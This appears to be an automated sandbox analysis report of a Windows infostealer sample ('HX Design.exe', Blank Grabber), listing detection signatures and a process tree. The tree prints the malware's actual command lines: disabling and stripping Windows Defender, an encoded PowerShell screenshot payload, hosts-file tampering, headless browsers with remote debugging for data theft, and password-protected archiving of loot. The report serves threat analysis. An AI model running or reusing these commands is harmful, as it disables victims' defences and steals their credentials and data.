Edit tour

Windows Analysis Report
HX Design.exe

Overview

General Information

Sample name:	HX Design.exe
Analysis ID:	1579227
MD5:	55933983c78673a3d30c3d7f8bd54b83
SHA1:	d9e701fe9c117fb428a533c219af3fcffbc42f34
SHA256:	9203d748f205c44735ccb43f9312cc818693de205075d8c0d3a3582eca6e2e63
Tags:	exesigneduser-lonenone1807
Infos:

Detection

Python Stealer, Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies the hosts file

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Uses cmd line tools excessively to alter registry or file data

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Python Stealer

Binary contains a suspicious time stamp

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Execution In Headless Mode

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Execution of Powershell with Base64

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

HX Design.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\HX Design.exe" MD5: 55933983C78673A3D30C3D7F8BD54B83)

HX Design.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\HX Design.exe" MD5: 55933983C78673A3D30C3D7F8BD54B83)

cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7764 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 7224 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7704 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7376 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7756 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7860 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8140 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6712 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5312 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7412 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7804 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7296 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7828 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8044 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2816 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7896 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7284 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8012 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7940 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8072 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3492 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1732 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1460 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4080 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

chrome.exe (PID: 908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 3992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8112 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7280 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3448 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

